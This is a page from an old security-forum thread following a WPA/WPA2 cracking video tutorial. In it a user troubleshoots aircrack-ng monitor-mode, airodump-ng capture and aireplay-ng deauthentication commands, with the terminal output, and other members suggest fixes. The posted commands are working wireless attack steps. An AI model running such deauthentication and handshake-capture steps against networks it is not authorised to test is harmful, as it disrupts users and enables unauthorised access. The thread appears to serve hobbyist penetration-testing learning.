Page 28 of 36 FirstFirst ... 182627282930 ... LastLast
Results 271 to 280 of 358

Thread: -=Xploitz=- VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"

  1. #271
    Just burned his ISO mcrete's Avatar
    Join Date
    Mar 2008
    Posts
    19

    Default

    there is the attachment of my previous post

  2. #272
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by mcrete View Post
    there is the attachment of my previous post


    Sorry, the free service is at full capacity. Please try later or upgrade to sendspace Max™ to enable guaranteed slots and instant, fast downloads.

    Oh well, rapidshare is slightly better. ;P
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #273
    Just burned his ISO mcrete's Avatar
    Join Date
    Mar 2008
    Posts
    19

    Default

    Soon I would upload this list in rapidshare!!

  4. #274
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    16

    Default

    Hi, I get an error... This, my full command from beginning.
    Quote Originally Posted by -=Xploitz=- View Post
    svn co attp://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
    cd aircrack-ng
    make
    make install
    done.

    Code:
    odod ~ # airmon-ng stop ath0
    
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    odod ~ # airmon-ng start wifi0
    
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    odod ~ # airodump-ng ath0 
    
     CH  5 ][ Elapsed: 8 s ][ 2008-04-09 18:45
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:11:22:33:44:55   23        1        2    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:11:22:33:44:55  66:77:88:99:00:11   -1  36- 0     0        2
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:11:22:33:44:55 ath0
    New Shell

    Code:
    odod ~ # aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0
    18:49:57  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    18:49:57  Sending 64 directed DeAuth. STMAC: [66:77:88:99:00:11] [ 0| 0 ACKs]
    odod ~ #
    Is this has something wrong?

    @-=Xploitz=-
    Your Solution is my New Experience. Thx.

  5. #275

    Default

    Quote Originally Posted by odod1985 View Post
    Hi, I get an error... This, my full command from beginning.

    done.

    Code:
    odod ~ # airmon-ng stop ath0
    
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    odod ~ # airmon-ng start wifi0
    
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    odod ~ # airodump-ng ath0 
    
     CH  5 ][ Elapsed: 8 s ][ 2008-04-09 18:45
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:11:22:33:44:55   23        1        2    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    
     00:11:22:33:44:55  66:77:88:99:00:11   -1  36- 0     0        2
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:11:22:33:44:55 ath0
    New Shell

    Code:
    odod ~ # aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0
    18:49:57  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    18:49:57  Sending 64 directed DeAuth. STMAC: [66:77:88:99:00:11] [ 0| 0 ACKs]
    odod ~ #
    Is this has something wrong?
    See where i've highlighted in red, why is your BSSID 00:11:22:33:44:55??
    or are you just masking out YOUR router MAC?

    From this
    aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0

    To This
    aireplay-ng -0 1 -e YOUR ROUTERNAME HERE -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0

    Also, have you established your ESSID yet? as I noticed <length

    How near / far are you from your router? & is there a client (66:77:88:99:00:11) yours as in is this definately connected to the same router?

  6. #276
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    16

    Default

    Quote Originally Posted by samsung View Post
    See where i've highlighted in red, why is your BSSID 00:11:22:33:44:55??
    or are you just masking out YOUR router MAC?
    Yes, I just masking out my router MAC.

    Quote Originally Posted by samsung View Post
    From this
    aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0

    To This
    aireplay-ng -0 1 -e YOUR ROUTERNAME HERE -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0
    Code:
    odod ~ # aireplay-ng -0 1 -e 'home' -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0
    18:49:57  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    18:49:57  Sending 64 directed DeAuth. STMAC: [66:77:88:99:00:11] [ 0| 0 ACKs]
    odod ~ #
    Quote Originally Posted by samsung View Post
    Also, have you established your ESSID yet? as I noticed <length
    <length because Broadcast = Disabled

    Quote Originally Posted by samsung View Post
    How near / far are you from your router?
    1"-2"

    Quote Originally Posted by samsung View Post
    & is there a client (66:77:88:99:00:11) yours as in is this definately connected to the same router?
    Yes, Still Connected.

    Help... Help...

    btw, thx fot the reply.

  7. #277
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    You said you listed ALL your commands...so wheres your macchanger command at??


    Also..I'd like to add that you might want to use channel 1 in your airmon-ng command to this>>>>

    airmon-ng start wifi0 1

    That will help you stay locked onto that particular channel.


    Follow samsungs advice, hes right on target. Since the essid broadcast is obviously off...you'll need to put the essid in your aireplay-ng command line.

    And use 5 to 10 deauths instead of only 1.

    aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:88:99:00:11 ath0


    ***EDIT**..if the essid has a space or any special characters in it...put it in double quotes like this>>>

    "-=Xploitz Network=-"
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  8. #278
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    16

    Default

    Something wrong if i change this:
    airmon-ng start wifi0 to airmon-ng start wifi0 1

    This the command:
    Code:
    odod ~ # airmon-ng stop ath0
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    
    odod ~ # airmon-ng start wifi0 1
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    
    odod ~ # airodump-ng ath0
    
    CH 12 ][ Elapsed: 3 mins ][ 2008-04-09 22:42
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:90:4C:91:00:01   15      162        4    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== not detect my client =====
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:90:4C:91:00:01 ath0
    
     CH  1 ][ Elapsed: 2 mins ][ 2008-04-09 22:45 ][ fixed channel ath0: 12
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES
    ===== empty =====
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== empty =====
    
    odod ~ #
    Fiuh... Is it new problem???

    btw, Thx All...

  9. #279
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by odod1985 View Post
    Something wrong if i change this:
    airmon-ng start wifi0 to airmon-ng start wifi0 1

    This the command:
    Code:
    odod ~ # airmon-ng stop ath0
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    
    odod ~ # airmon-ng start wifi0 1
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    
    odod ~ # airodump-ng ath0
    
    CH 12 ][ Elapsed: 3 mins ][ 2008-04-09 22:42
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:90:4C:91:00:01   15      162        4    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== not detect my client =====
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:90:4C:91:00:01 ath0
    
     CH  1 ][ Elapsed: 2 mins ][ 2008-04-09 22:45 ][ fixed channel ath0: 12
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES
    ===== empty =====
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== empty =====
    
    odod ~ #
    Fiuh... Is it new problem???

    btw, Thx All...
    Sorry, but I have to ask......

    Is your client connected? Also it might be "hiding"...try using the command >>>>>>

    Code:
    aireplay-ng -0 5 -a 00:90:4C:91:00:01 ath0
    to flush it out. This command will send 5 deauths to the AP and *should* unhide your connected client.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  10. #280
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    16

    Default

    Quote Originally Posted by -=Xploitz=- View Post
    Sorry, but I have to ask......

    Is your client connected?
    Yes, my client still connected.

    Now, i set the SSID Broadcast = Enabled
    Quote Originally Posted by -=Xploitz=- View Post
    Also it might be "hiding"...try using the command >>>>>>

    Code:
    aireplay-ng -0 5 -a 00:90:4C:91:00:01 ath0
    to flush it out. This command will send 5 deauths to the AP and *should* unhide your connected client.
    Code:
    odod ~ # airmon-ng stop ath0
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
    
    
    odod ~ # airmon-ng start wifi0 1
    
    Interface       Chipset         Driver
    
    wifi0           Atheros         madwifi-ng
    ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
    
    
    odod ~ # airodump-ng ath0
    
    CH 12 ][ Elapsed: 3 mins ][ 2008-04-09 22:42
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    
     00:90:4C:91:00:01   15      162        4    0   1  54. WPA  TKIP   PSK  <leng
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== not detect my client =====
    
    odod ~ # airodump-ng -c 1 -w psk --bssid 00:90:4C:91:00:01 ath0
    
     CH  1 ][ Elapsed: 2 mins ][ 2008-04-09 22:45 ][ fixed channel ath0: 12
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES
    ===== empty =====
    
     BSSID              STATION            PWR   Rate  Lost  Packets  Probes
    ===== empty =====
    
    odod ~ #
    New Shell
    Code:
    odod ~ # aireplay-ng -0 5 -e "C-6 Wi-Fi" -a 00:90:4C:91:00:01 -c 00:13:02:31:AB:EB ath0
    23:35:56  Waiting for beacon frame (BSSID: 00:90:4C:91:00:01) on channel 12
    ..... Waiting for a Looong Time .....
    I Think the problem is on the Channel, is it right? (Just my Feeling. Hehehehehe.)

    Help Me...

Page 28 of 36 FirstFirst ... 182627282930 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •